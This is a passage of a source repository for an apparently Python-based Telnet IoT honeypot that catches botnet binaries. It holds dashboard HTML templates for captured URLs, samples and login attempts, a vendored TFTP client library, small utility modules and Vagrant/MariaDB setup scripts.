-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Phype/telnet-iot-honeypot/5d32829a36b5bcd369e47d9225f7a88dfdcfe490/html/img/flags/wf.png -------------------------------------------------------------------------------- /html/img/flags/ws.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Phype/telnet-iot-honeypot/5d32829a36b5bcd369e47d9225f7a88dfdcfe490/html/img/flags/ws.png -------------------------------------------------------------------------------- /html/img/flags/ye.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Phype/telnet-iot-honeypot/5d32829a36b5bcd369e47d9225f7a88dfdcfe490/html/img/flags/ye.png -------------------------------------------------------------------------------- /html/img/flags/yt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Phype/telnet-iot-honeypot/5d32829a36b5bcd369e47d9225f7a88dfdcfe490/html/img/flags/yt.png -------------------------------------------------------------------------------- /html/img/flags/za.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Phype/telnet-iot-honeypot/5d32829a36b5bcd369e47d9225f7a88dfdcfe490/html/img/flags/za.png -------------------------------------------------------------------------------- /html/img/flags/zm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Phype/telnet-iot-honeypot/5d32829a36b5bcd369e47d9225f7a88dfdcfe490/html/img/flags/zm.png -------------------------------------------------------------------------------- /html/img/flags/zw.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Phype/telnet-iot-honeypot/5d32829a36b5bcd369e47d9225f7a88dfdcfe490/html/img/flags/zw.png -------------------------------------------------------------------------------- /html/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 54 | 55 | 56 | 57 | 58 | 88 | 89 | 90 | 93 | 94 |
95 |
96 |
97 | 98 | 99 | -------------------------------------------------------------------------------- /html/js/angular-vis.js: -------------------------------------------------------------------------------- 1 | angular.module('ngVis', []) 2 | 3 | .factory('VisDataSet', function () { 4 | 'use strict'; 5 | return function (data, options) { 6 | // Create the new dataSets 7 | return new vis.DataSet(data, options); 8 | }; 9 | }) 10 | 11 | /** 12 | * TimeLine directive 13 | */ 14 | .directive('visTimeline', function () { 15 | 'use strict'; 16 | return { 17 | restrict: 'EA', 18 | transclude: false, 19 | scope: { 20 | data: '=', 21 | options: '=', 22 | events: '=' 23 | }, 24 | link: function (scope, element, attr) { 25 | var timelineEvents = [ 26 | 'rangechange', 27 | 'rangechanged', 28 | 'timechange', 29 | 'timechanged', 30 | 'select', 31 | 'doubleClick', 32 | 'click', 33 | 'contextmenu' 34 | ]; 35 | 36 | // Declare the timeline 37 | var timeline = null; 38 | 39 | scope.$watch('data', function () { 40 | // Sanity check 41 | console.log(scope.data); 42 | if (scope.data == null) { 43 | return; 44 | } 45 | 46 | // If we've actually changed the data set, then recreate the graph 47 | // We can always update the data by adding more data to the existing data set 48 | if (timeline != null) { 49 | timeline.destroy(); 50 | } 51 | 52 | // Create the timeline object 53 | console.log(scope.data); 54 | timeline = new vis.Timeline(element[0], scope.data.items, scope.data.groups, scope.options); 55 | 56 | // Attach an event handler if defined 57 | angular.forEach(scope.events, function (callback, event) { 58 | if (timelineEvents.indexOf(String(event)) >= 0) { 59 | timeline.on(event, callback); 60 | } 61 | }); 62 | 63 | // onLoad callback 64 | if (scope.events != null && scope.events.onload != null && 65 | angular.isFunction(scope.events.onload)) { 66 | scope.events.onload(timeline); 67 | } 68 | }); 69 | 70 | scope.$watchCollection('options', function (options) { 71 | if (timeline == null) { 72 | return; 73 | } 74 | timeline.setOptions(options); 75 | }); 76 | } 77 | }; 78 | }) 79 | 80 | /** 81 | * Directive for network chart. 82 | */ 83 | .directive('visNetwork', function () { 84 | return { 85 | restrict: 'EA', 86 | transclude: false, 87 | scope: { 88 | data: '=', 89 | options: '=', 90 | events: '=' 91 | }, 92 | link: function (scope, element, attr) { 93 | var networkEvents = [ 94 | 'click', 95 | 'doubleclick', 96 | 'oncontext', 97 | 'hold', 98 | 'release', 99 | 'selectNode', 100 | 'selectEdge', 101 | 'deselectNode', 102 | 'deselectEdge', 103 | 'dragStart', 104 | 'dragging', 105 | 'dragEnd', 106 | 'hoverNode', 107 | 'blurNode', 108 | 'zoom', 109 | 'showPopup', 110 | 'hidePopup', 111 | 'startStabilizing', 112 | 'stabilizationProgress', 113 | 'stabilizationIterationsDone', 114 | 'stabilized', 115 | 'resize', 116 | 'initRedraw', 117 | 'beforeDrawing', 118 | 'afterDrawing', 119 | 'animationFinished' 120 | 121 | ]; 122 | 123 | var network = null; 124 | 125 | scope.$watch('data', function () { 126 | // Sanity check 127 | if (scope.data == null) { 128 | return; 129 | } 130 | 131 | // If we've actually changed the data set, then recreate the graph 132 | // We can always update the data by adding more data to the existing data set 133 | if (network != null) { 134 | network.destroy(); 135 | } 136 | 137 | // Create the graph2d object 138 | network = new vis.Network(element[0], scope.data, scope.options); 139 | 140 | // Attach an event handler if defined 141 | angular.forEach(scope.events, function (callback, event) { 142 | if (networkEvents.indexOf(String(event)) >= 0) { 143 | network.on(event, callback); 144 | } 145 | }); 146 | 147 | // onLoad callback 148 | if (scope.events != null && scope.events.onload != null && 149 | angular.isFunction(scope.events.onload)) { 150 | scope.events.onload(graph); 151 | } 152 | }); 153 | 154 | scope.$watchCollection('options', function (options) { 155 | if (network == null) { 156 | return; 157 | } 158 | network.setOptions(options); 159 | }); 160 | } 161 | }; 162 | }) 163 | 164 | /** 165 | * Directive for graph2d. 166 | */ 167 | .directive('visGraph2d', function () { 168 | 'use strict'; 169 | return { 170 | restrict: 'EA', 171 | transclude: false, 172 | scope: { 173 | data: '=', 174 | options: '=', 175 | events: '=' 176 | }, 177 | link: function (scope, element, attr) { 178 | var graphEvents = [ 179 | 'rangechange', 180 | 'rangechanged', 181 | 'timechange', 182 | 'timechanged', 183 | 'finishedRedraw' 184 | ]; 185 | 186 | // Create the chart 187 | var graph = null; 188 | 189 | scope.$watch('data', function () { 190 | // Sanity check 191 | if (scope.data == null) { 192 | return; 193 | } 194 | 195 | // If we've actually changed the data set, then recreate the graph 196 | // We can always update the data by adding more data to the existing data set 197 | if (graph != null) { 198 | graph.destroy(); 199 | } 200 | 201 | // Create the graph2d object 202 | graph = new vis.Graph2d(element[0], scope.data.items, scope.data.groups, scope.options); 203 | 204 | // Attach an event handler if defined 205 | angular.forEach(scope.events, function (callback, event) { 206 | if (graphEvents.indexOf(String(event)) >= 0) { 207 | graph.on(event, callback); 208 | } 209 | }); 210 | 211 | // onLoad callback 212 | if (scope.events != null && scope.events.onload != null && 213 | angular.isFunction(scope.events.onload)) { 214 | scope.events.onload(graph); 215 | } 216 | }); 217 | 218 | scope.$watchCollection('options', function (options) { 219 | if (graph == null) { 220 | return; 221 | } 222 | graph.setOptions(options); 223 | }); 224 | } 225 | }; 226 | }) 227 | ; 228 | 229 | -------------------------------------------------------------------------------- /html/network.html: -------------------------------------------------------------------------------- 1 | 2 |

Network Info

3 |
4 |
5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 |
id#{{ network.id }}
Malware{{ network.malware.name != null ? network.malware.name : fakenames[network.malware.id] }} see
Connections{{ network.firstconns }} / {{ network.connections }} from {{ formatDate(network.firsttime) }} to {{ formatDate(network.lasttime) }} see all
Urls{{ network.urls }}
Samples{{ network.samples }}
14 |
15 | 16 |
17 | 18 |
19 | 22 | 23 |
24 |
Initial Connections per Hour
25 |
26 | 27 |
28 |

Connections by honeypot

29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 |
NameConnections
{{ name }}{{ count }}
40 |
41 | 42 |
43 |

Network graph load graph

44 |
45 | 46 |
47 |
48 |
49 | -------------------------------------------------------------------------------- /html/networks.html: -------------------------------------------------------------------------------- 1 |

Networks

2 | 3 | 4 | 5 |
Initial Connections per Hour
6 |
7 | 10 | 11 |
12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 |
#MalwareN⁰ initial Conn'sN⁰ UrlsN⁰ Samples
#{{network.id}}{{ network.malware.name != null ? network.malware.name : fakenames[network.malware.id] }}{{ network.firstconns }}{{ network.urls }}{{ network.samples }}
34 | -------------------------------------------------------------------------------- /html/overview.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |
4 |

Telnet-Iot-Honeypot Python honeypot for catching botnet binaries

5 |
6 | 7 |

8 | This is the start page of this installation of the Telnet-Iot-Honeypot.
9 | More info: https://github.com/Phype/telnet-iot-honeypot 10 |

11 | 12 |

Latest Urls

13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 |
UrlDate
{{ url.url }}{{ formatDate(url.date) }}
30 | 31 |

Latest Samples

32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 |
NameSize (Bytes)First Seen
{{ sample.name }}{{ sample.length }}{{ formatDate(sample.date) }}
51 | 52 | 53 |

Latest Connections more

54 | 55 |
56 |
57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 |
DateCountryUsernamePassword
{{ formatDate(connection.date) }} {{ connection.country }}{{ connection.user }}{{ connection.password }}
78 |
79 | 80 | 81 | 82 |
83 | 86 | 87 |
88 |
All Connections by Country
Click on country to see all connections
89 |
90 | 91 |
92 |
93 |
94 | -------------------------------------------------------------------------------- /html/sample.html: -------------------------------------------------------------------------------- 1 |

Sample Info

2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 17 | 18 | 23 | 24 |
First seen{{ formatDate(sample.date) }}
First seen file name{{ sample.name }}
File size{{ sample.length }} Bytes
SHA256{{ sample.sha256 }}
Virustotal result 12 | 13 | {{ sample.result }} 14 | 15 | Unknown, search yourself 16 |
Network / Malware 19 | #{{ sample.network.id }} 20 | / 21 | {{ sample.network.malware.name != null ? sample.network.malware.name : fakenames[sample.network.malware.id] }} 22 |
25 | 26 |

Download Info

27 | 28 | 
{{ sample.info }}
29 | 30 |

Downloaded from

31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 |
UrlDateN⁰ Connections
{{ url.url }}{{ formatDate(url.date) }}{{ url.connections.length }}
46 | -------------------------------------------------------------------------------- /html/samples.html: -------------------------------------------------------------------------------- 1 |

Samples

2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 |
NameSize (Bytes)First Seen
{{ sample.name }}{{ sample.length }}{{ formatDate(sample.date) }}
21 | -------------------------------------------------------------------------------- /html/tag.html: -------------------------------------------------------------------------------- 1 |

Tag Info

2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |
Name{{ tag.name }}
Code{{ tag.code }}
N° Hits{{ tag.connections.length }}
10 | 11 |

Connections

12 | 13 |
14 | -------------------------------------------------------------------------------- /html/tags.html: -------------------------------------------------------------------------------- 1 |

Tags

2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 |
NameCodeN⁰ Hits
{{ tag.name }}{{ tag.code }}{{ tag.connections }}
17 | 18 | -------------------------------------------------------------------------------- /html/url.html: -------------------------------------------------------------------------------- 1 |

URL Info

2 | 3 | 4 | 5 | 6 | 7 | 8 | 15 | 16 | 17 |
URL{{ url.url }}
First seen{{ formatDate(url.date) }}
Resolves to 9 | {{ url.countryname }}
10 | {{ url.ip }}
11 | AS{{ url.asn.asn }} {{ url.asn.name }} 12 | 13 |
14 |
18 | 19 |

Sample

20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 |
First seen{{ formatDate(url.sample.date) }}
First seen file name{{ url.sample.name }}
File size{{ url.sample.length }} Bytes
SHA256{{ url.sample.sha256 }}
Virustotal result{{ nicenull(url.sample.result, "Not Scanned yet") }}
30 | 31 |

Connections included this URL

32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 |
DateIPUsernamePassword
{{ formatDate(connection.date) }}{{ connection.ip }}{{ connection.user }}{{ connection.pass }}
-------------------------------------------------------------------------------- /html/urls.html: -------------------------------------------------------------------------------- 1 |

Urls

2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 |
CountryUrlDate
{{ url.countryname }} {{ url.url }}{{ formatDate(url.date) }}
21 | -------------------------------------------------------------------------------- /images/network.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Phype/telnet-iot-honeypot/5d32829a36b5bcd369e47d9225f7a88dfdcfe490/images/network.png -------------------------------------------------------------------------------- /images/screen1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Phype/telnet-iot-honeypot/5d32829a36b5bcd369e47d9225f7a88dfdcfe490/images/screen1.png -------------------------------------------------------------------------------- /images/screen2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Phype/telnet-iot-honeypot/5d32829a36b5bcd369e47d9225f7a88dfdcfe490/images/screen2.png -------------------------------------------------------------------------------- /images/screen3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Phype/telnet-iot-honeypot/5d32829a36b5bcd369e47d9225f7a88dfdcfe490/images/screen3.png -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | setuptools 2 | werkzeug 3 | flask 4 | flask-httpauth 5 | flask-socketio 6 | sqlalchemy 7 | requests 8 | decorator 9 | dnspython 10 | ipaddress 11 | simpleeval 12 | pyyaml 13 | argon2 14 | eventlet 15 | -------------------------------------------------------------------------------- /tftpy/TftpClient.py: -------------------------------------------------------------------------------- 1 | """This module implements the TFTP Client functionality. Instantiate an 2 | instance of the client, and then use its upload or download method. Logging is 3 | performed via a standard logging object set in TftpShared.""" 4 | 5 | import types 6 | from TftpShared import * 7 | from TftpPacketTypes import * 8 | from TftpContexts import TftpContextClientDownload, TftpContextClientUpload 9 | 10 | class TftpClient(TftpSession): 11 | """This class is an implementation of a tftp client. Once instantiated, a 12 | download can be initiated via the download() method, or an upload via the 13 | upload() method.""" 14 | 15 | def __init__(self, host, port, options={}): 16 | TftpSession.__init__(self) 17 | self.context = None 18 | self.host = host 19 | self.iport = port 20 | self.filename = None 21 | self.options = options 22 | if self.options.has_key('blksize'): 23 | size = self.options['blksize'] 24 | tftpassert(types.IntType == type(size), "blksize must be an int") 25 | if size < MIN_BLKSIZE or size > MAX_BLKSIZE: 26 | raise TftpException, "Invalid blksize: %d" % size 27 | 28 | def download(self, filename, output, packethook=None, timeout=SOCK_TIMEOUT): 29 | """This method initiates a tftp download from the configured remote 30 | host, requesting the filename passed. It saves the file to a local 31 | file specified in the output parameter. If a packethook is provided, 32 | it must be a function that takes a single parameter, which will be a 33 | copy of each DAT packet received in the form of a TftpPacketDAT 34 | object. The timeout parameter may be used to override the default 35 | SOCK_TIMEOUT setting, which is the amount of time that the client will 36 | wait for a receive packet to arrive. 37 | 38 | Note: If output is a hyphen then stdout is used.""" 39 | # We're downloading. 40 | log.debug("Creating download context with the following params:") 41 | log.debug("host = %s, port = %s, filename = %s, output = %s" 42 | % (self.host, self.iport, filename, output)) 43 | log.debug("options = %s, packethook = %s, timeout = %s" 44 | % (self.options, packethook, timeout)) 45 | self.context = TftpContextClientDownload(self.host, 46 | self.iport, 47 | filename, 48 | output, 49 | self.options, 50 | packethook, 51 | timeout) 52 | self.context.start() 53 | # Download happens here 54 | self.context.end() 55 | 56 | metrics = self.context.metrics 57 | 58 | log.info('') 59 | log.info("Download complete.") 60 | if metrics.duration == 0: 61 | log.info("Duration too short, rate undetermined") 62 | else: 63 | log.info("Downloaded %.2f bytes in %.2f seconds" % (metrics.bytes, metrics.duration)) 64 | log.info("Average rate: %.2f kbps" % metrics.kbps) 65 | log.info("%.2f bytes in resent data" % metrics.resent_bytes) 66 | log.info("Received %d duplicate packets" % metrics.dupcount) 67 | 68 | def upload(self, filename, input, packethook=None, timeout=SOCK_TIMEOUT): 69 | """This method initiates a tftp upload to the configured remote host, 70 | uploading the filename passed. If a packethook is provided, it must 71 | be a function that takes a single parameter, which will be a copy of 72 | each DAT packet sent in the form of a TftpPacketDAT object. The 73 | timeout parameter may be used to override the default SOCK_TIMEOUT 74 | setting, which is the amount of time that the client will wait for a 75 | DAT packet to be ACKd by the server. 76 | 77 | The input option is the full path to the file to upload, which can 78 | optionally be '-' to read from stdin. 79 | 80 | Note: If output is a hyphen then stdout is used.""" 81 | self.context = TftpContextClientUpload(self.host, 82 | self.iport, 83 | filename, 84 | input, 85 | self.options, 86 | packethook, 87 | timeout) 88 | self.context.start() 89 | # Upload happens here 90 | self.context.end() 91 | 92 | metrics = self.context.metrics 93 | 94 | log.info('') 95 | log.info("Upload complete.") 96 | if metrics.duration == 0: 97 | log.info("Duration too short, rate undetermined") 98 | else: 99 | log.info("Uploaded %d bytes in %.2f seconds" % (metrics.bytes, metrics.duration)) 100 | log.info("Average rate: %.2f kbps" % metrics.kbps) 101 | log.info("%.2f bytes in resent data" % metrics.resent_bytes) 102 | log.info("Resent %d packets" % metrics.dupcount) 103 | -------------------------------------------------------------------------------- /tftpy/TftpPacketFactory.py: -------------------------------------------------------------------------------- 1 | """This module implements the TftpPacketFactory class, which can take a binary 2 | buffer, and return the appropriate TftpPacket object to represent it, via the 3 | parse() method.""" 4 | 5 | from TftpShared import * 6 | from TftpPacketTypes import * 7 | 8 | class TftpPacketFactory(object): 9 | """This class generates TftpPacket objects. It is responsible for parsing 10 | raw buffers off of the wire and returning objects representing them, via 11 | the parse() method.""" 12 | def __init__(self): 13 | self.classes = { 14 | 1: TftpPacketRRQ, 15 | 2: TftpPacketWRQ, 16 | 3: TftpPacketDAT, 17 | 4: TftpPacketACK, 18 | 5: TftpPacketERR, 19 | 6: TftpPacketOACK 20 | } 21 | 22 | def parse(self, buffer): 23 | """This method is used to parse an existing datagram into its 24 | corresponding TftpPacket object. The buffer is the raw bytes off of 25 | the network.""" 26 | log.debug("parsing a %d byte packet" % len(buffer)) 27 | (opcode,) = struct.unpack("!H", buffer[:2]) 28 | log.debug("opcode is %d" % opcode) 29 | packet = self.__create(opcode) 30 | packet.buffer = buffer 31 | return packet.decode() 32 | 33 | def __create(self, opcode): 34 | """This method returns the appropriate class object corresponding to 35 | the passed opcode.""" 36 | tftpassert(self.classes.has_key(opcode), 37 | "Unsupported opcode: %d" % opcode) 38 | 39 | packet = self.classes[opcode]() 40 | 41 | return packet 42 | -------------------------------------------------------------------------------- /tftpy/TftpShared.py: -------------------------------------------------------------------------------- 1 | """This module holds all objects shared by all other modules in tftpy.""" 2 | 3 | import logging 4 | 5 | LOG_LEVEL = logging.NOTSET 6 | MIN_BLKSIZE = 8 7 | DEF_BLKSIZE = 512 8 | MAX_BLKSIZE = 65536 9 | SOCK_TIMEOUT = 5 10 | MAX_DUPS = 20 11 | TIMEOUT_RETRIES = 5 12 | DEF_TFTP_PORT = 69 13 | 14 | # A hook for deliberately introducing delay in testing. 15 | DELAY_BLOCK = 0 16 | 17 | # Initialize the logger. 18 | logging.basicConfig() 19 | # The logger used by this library. Feel free to clobber it with your own, if you like, as 20 | # long as it conforms to Python's logging. 21 | log = logging.getLogger('tftpy') 22 | 23 | def tftpassert(condition, msg): 24 | """This function is a simple utility that will check the condition 25 | passed for a false state. If it finds one, it throws a TftpException 26 | with the message passed. This just makes the code throughout cleaner 27 | by refactoring.""" 28 | if not condition: 29 | raise TftpException, msg 30 | 31 | def setLogLevel(level): 32 | """This function is a utility function for setting the internal log level. 33 | The log level defaults to logging.NOTSET, so unwanted output to stdout is 34 | not created.""" 35 | global log 36 | log.setLevel(level) 37 | 38 | class TftpErrors(object): 39 | """This class is a convenience for defining the common tftp error codes, 40 | and making them more readable in the code.""" 41 | NotDefined = 0 42 | FileNotFound = 1 43 | AccessViolation = 2 44 | DiskFull = 3 45 | IllegalTftpOp = 4 46 | UnknownTID = 5 47 | FileAlreadyExists = 6 48 | NoSuchUser = 7 49 | FailedNegotiation = 8 50 | 51 | class TftpException(Exception): 52 | """This class is the parent class of all exceptions regarding the handling 53 | of the TFTP protocol.""" 54 | pass 55 | 56 | class TftpTimeout(TftpException): 57 | """This class represents a timeout error waiting for a response from the 58 | other end.""" 59 | pass 60 | -------------------------------------------------------------------------------- /tftpy/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | This library implements the tftp protocol, based on rfc 1350. 3 | http://www.faqs.org/rfcs/rfc1350.html 4 | At the moment it implements only a client class, but will include a server, 5 | with support for variable block sizes. 6 | 7 | As a client of tftpy, this is the only module that you should need to import 8 | directly. The TftpClient and TftpServer classes can be reached through it. 9 | """ 10 | 11 | import sys 12 | 13 | # Make sure that this is at least Python 2.3 14 | verlist = sys.version_info 15 | if not verlist[0] >= 2 or not verlist[1] >= 3: 16 | raise AssertionError, "Requires at least Python 2.3" 17 | 18 | from TftpShared import * 19 | from TftpPacketTypes import * 20 | from TftpPacketFactory import * 21 | from TftpClient import * 22 | from TftpServer import * 23 | from TftpContexts import * 24 | from TftpStates import * 25 | -------------------------------------------------------------------------------- /util/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Phype/telnet-iot-honeypot/5d32829a36b5bcd369e47d9225f7a88dfdcfe490/util/__init__.py -------------------------------------------------------------------------------- /util/config.py: -------------------------------------------------------------------------------- 1 | import yaml 2 | import random 3 | import string 4 | 5 | def rand(): 6 | chars = string.ascii_uppercase + string.digits 7 | return ''.join(random.SystemRandom().choice(chars) for _ in range(32)) 8 | 9 | class Config: 10 | def __init__(self): 11 | self.distconfig = self.loadyaml("config.dist.yaml") 12 | try: 13 | self.userconfig = self.loadyaml("config.yaml") 14 | except: 15 | print "Warning: Cannot load config.yaml" 16 | self.userconfig = {} 17 | 18 | def loadyaml(self, filename): 19 | with open(filename, "rb") as fp: 20 | string = fp.read() 21 | return yaml.load(string) 22 | 23 | def loadUserConfig(self, filename): 24 | try: 25 | self.userconfig = self.loadyaml(filename) 26 | except: 27 | print "Warning: Cannot load " + str(filename) 28 | 29 | def get(self, key, optional=False, default=None): 30 | if key in self.userconfig: 31 | return self.userconfig[key] 32 | elif key in self.distconfig: 33 | return self.distconfig[key] 34 | elif not(optional): 35 | raise Exception("Option \""+ key +"\" not found in config") 36 | else: 37 | return default 38 | 39 | config = Config() 40 | 41 | -------------------------------------------------------------------------------- /util/dbg.py: -------------------------------------------------------------------------------- 1 | import datetime 2 | import traceback 3 | import sys 4 | import os.path 5 | 6 | DEBUG = True 7 | 8 | def dbg(msg): 9 | if DEBUG: 10 | now = datetime.datetime.now() 11 | now = now.strftime('%Y-%m-%d %H:%M:%S') 12 | line = traceback.extract_stack()[-2] 13 | line = os.path.basename(line[0]) + ":" + str(line[1]) 14 | print(now + " " + line.ljust(16, " ") + " " + msg) 15 | sys.stdout.flush() 16 | -------------------------------------------------------------------------------- /vagrant/.gitignore: -------------------------------------------------------------------------------- 1 | .vagrant 2 | *.log 3 | 4 | -------------------------------------------------------------------------------- /vagrant/mariadb/Vagrantfile: -------------------------------------------------------------------------------- 1 | # -*- mode: ruby -*- 2 | # vi: set ft=ruby : 3 | 4 | # All Vagrant configuration is done below. The "2" in Vagrant.configure 5 | # configures the configuration version (we support older styles for 6 | # backwards compatibility). Please don't change it unless you know what 7 | # you're doing. 8 | 9 | Vagrant.configure(2) do |config| 10 | 11 | # The most common configuration options are documented and commented below. 12 | # For a complete reference, please see the online documentation at 13 | # https://docs.vagrantup.com. 14 | 15 | # Every Vagrant development environment requires a box. You can search for 16 | # boxes at https://atlas.hashicorp.com/search. 17 | config.vm.box = "ubuntu/xenial64" 18 | 19 | # Disable automatic box update checking. If you disable this, then 20 | # boxes will only be checked for updates when the user runs 21 | # `vagrant box outdated`. This is not recommended. 22 | # config.vm.box_check_update = false 23 | 24 | # Create a forwarded port mapping which allows access to a specific port 25 | # within the machine from a port on the host machine. In the example below, 26 | # accessing "localhost:8080" will access port 80 on the guest machine. 27 | config.vm.network "forwarded_port", guest: 5000, host: 5000 28 | config.vm.network "forwarded_port", guest: 2323, host: 2323 29 | 30 | # Create a private network, which allows host-only access to the machine 31 | # using a specific IP. 32 | # config.vm.network "private_network", ip: "192.168.33.10" 33 | 34 | # Create a public network, which generally matched to bridged network. 35 | # Bridged networks make the machine appear as another physical device on 36 | # your network. 37 | # config.vm.network "public_network" 38 | 39 | # Share an additional folder to the guest VM. The first argument is 40 | # the path on the host to the actual folder. The second argument is 41 | # the path on the guest to mount the folder. And the optional third 42 | # argument is a set of non-required options. 43 | config.vm.synced_folder "../../", "/vagrant_data" 44 | 45 | # Provider-specific configuration so you can fine-tune various 46 | # backing providers for Vagrant. These expose provider-specific options. 47 | # Example for VirtualBox: 48 | 49 | config.vm.provider "virtualbox" do |vb| 50 | # Display the VirtualBox GUI when booting the machine 51 | vb.gui = false 52 | 53 | # Customize the amount of memory on the VM: 54 | vb.memory = "1024" 55 | # vb.cpus = 2 56 | end 57 | 58 | # View the documentation for the provider you are using for more 59 | # information on available options. 60 | 61 | # Define a Vagrant Push strategy for pushing to Atlas. Other push strategies 62 | # such as FTP and Heroku are also available. See the documentation at 63 | # https://docs.vagrantup.com/v2/push/atlas.html for more information. 64 | # config.push.define "atlas" do |push| 65 | # push.app = "YOUR_ATLAS_USERNAME/YOUR_APPLICATION_NAME" 66 | # end 67 | 68 | # Enable provisioning with a shell script. Additional provisioners such as 69 | # Puppet, Chef, Ansible, Salt, and Docker are also available. Please see the 70 | # documentation for more information about their specific syntax and use. 71 | config.vm.provision "shell", privileged: 'false', inline: <<-SHELL 72 | sudo apt-get update 73 | sudo apt-get install -y python-pip sqlite3 screen libmysqlclient-dev python-mysqldb 74 | 75 | cp -r /vagrant_data telnet-iot-honeypot 76 | cd telnet-iot-honeypot 77 | rm database.db 78 | rm config.yaml 79 | 80 | export LC_ALL=C 81 | sudo pip install -r requirements.txt 82 | 83 | sudo bash create_config.sh 84 | sudo bash vagrant/mariadb/mysql.sh 85 | SHELL 86 | 87 | config.vm.provision "shell", privileged: 'false', run: 'always', inline: <<-SHELL 88 | screen -dmS backend bash -c "cd telnet-iot-honeypot; python backend.py" 89 | sleep 5 90 | screen -dmS honeypot bash -c "cd telnet-iot-honeypot; python honeypot.py" 91 | screen -list 92 | SHELL 93 | end 94 | 95 | -------------------------------------------------------------------------------- /vagrant/mariadb/mysql.sh: -------------------------------------------------------------------------------- 1 | #/bin/bash 2 | 3 | echo " - Install MariaDB" 4 | sudo apt-get install -y mariadb-server 5 | 6 | user=honey 7 | db=honey 8 | pw=$(openssl rand -hex 16) 9 | sql="mysql+mysqldb://$user:$pw@localhost/$db" 10 | 11 | echo " - Create DB" 12 | echo "" 13 | echo "DROP USER $user;" | sudo mysql 14 | echo "DROP USER '$user'@'localhost'" | sudo mysql 15 | echo "DROP DATABASE $db;" | sudo mysql 16 | echo "CREATE USER '$user'@'localhost' IDENTIFIED BY '$pw'; 17 | CREATE DATABASE $db CHARACTER SET latin1 COLLATE latin1_swedish_ci; 18 | GRANT ALL ON $db.* TO '$user'@'localhost'; 19 | FLUSH PRIVILEGES; 20 | " | sudo mysql 21 | 22 | echo " - Writing config" 23 | echo sql: \"$sql\" >> config.yaml 24 | 25 | -------------------------------------------------------------------------------- /vagrant/sqlite/Vagrantfile: -------------------------------------------------------------------------------- 1 | # -*- mode: ruby -*- 2 | # vi: set ft=ruby : 3 | 4 | # All Vagrant configuration is done below. The "2" in Vagrant.configure 5 | # configures the configuration version (we support older styles for 6 | # backwards compatibility). Please don't change it unless you know what 7 | # you're doing. 8 | 9 | Vagrant.configure(2) do |config| 10 | 11 | # The most common configuration options are documented and commented below. 12 | # For a complete reference, please see the online documentation at 13 | # https://docs.vagrantup.com. 14 | 15 | # Every Vagrant development environment requires a box. You can search for 16 | # boxes at https://atlas.hashicorp.com/search. 17 | config.vm.box = "ubuntu/xenial64" 18 | 19 | # Disable automatic box update checking. If you disable this, then 20 | # boxes will only be checked for updates when the user runs 21 | # `vagrant box outdated`. This is not recommended. 22 | # config.vm.box_check_update = false 23 | 24 | # Create a forwarded port mapping which allows access to a specific port 25 | # within the machine from a port on the host machine. In the example below, 26 | # accessing "localhost:8080" will access port 80 on the guest machine. 27 | config.vm.network "forwarded_port", guest: 5000, host: 5000 28 | config.vm.network "forwarded_port", guest: 2323, host: 2323 29 | 30 | # Create a private network, which allows host-only access to the machine 31 | # using a specific IP. 32 | # config.vm.network "private_network", ip: "192.168.33.10" 33 | 34 | # Create a public network, which generally matched to bridged network. 35 | # Bridged networks make the machine appear as another physical device on 36 | # your network. 37 | # config.vm.network "public_network" 38 | 39 | # Share an additional folder to the guest VM. The first argument is 40 | # the path on the host to the actual folder. The second argument is 41 | # the path on the guest to mount the folder. And the optional third 42 | # argument is a set of non-required options. 43 | config.vm.synced_folder "../../", "/vagrant_data" 44 | 45 | # Provider-specific configuration so you can fine-tune various 46 | # backing providers for Vagrant. These expose provider-specific options. 47 | # Example for VirtualBox: 48 | 49 | config.vm.provider "virtualbox" do |vb| 50 | # Display the VirtualBox GUI when booting the machine 51 | vb.gui = false 52 | 53 | # Customize the amount of memory on the VM: 54 | vb.memory = "768" 55 | # vb.cpus = 2 56 | end 57 | 58 | # View the documentation for the provider you are using for more 59 | # information on available options. 60 | 61 | # Define a Vagrant Push strategy for 